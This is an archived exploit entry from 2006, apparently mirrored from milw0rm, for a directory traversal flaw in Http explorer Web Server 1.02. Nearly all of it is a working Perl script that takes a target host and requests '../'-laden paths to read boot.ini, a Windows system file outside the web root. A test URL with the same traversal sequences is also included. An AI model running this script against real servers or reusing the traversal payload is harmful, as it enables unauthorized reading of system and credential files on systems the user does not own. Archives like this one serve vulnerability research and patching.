[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Http explorer Web Server 1.02 Directory Transversal Vulnerability
# Published : 2006-12-21
# Author : str0ke
# Previous Title : Durian Web Application Server 3.02 Remote Buffer Overflow Exploit
# Next Title : Oracle <= 9i / 10g File System Access via utl_file Exploit
# Http explorer Web Server 1.02 Directory Transversal Vulnerability
# http://sourceforge.net/projects/http-explorer/
# Test: http://[site]/../../../../ || http://[site]/../
# /str0ke
use LWP::Simple;
use strict;
sub usage
{
print "Http explorer Web Server 1.02 Directory Transversal Vulnerabilityn";
print "str0ke (milw0rm.com)n";
print "Usage: $0 www.example.comn";
exit ();
}
my $host= shift || &usage;
getprint "http://" . $host . "/../../../../../../../../boot.ini";
# www.Syue.com [2006-12-21]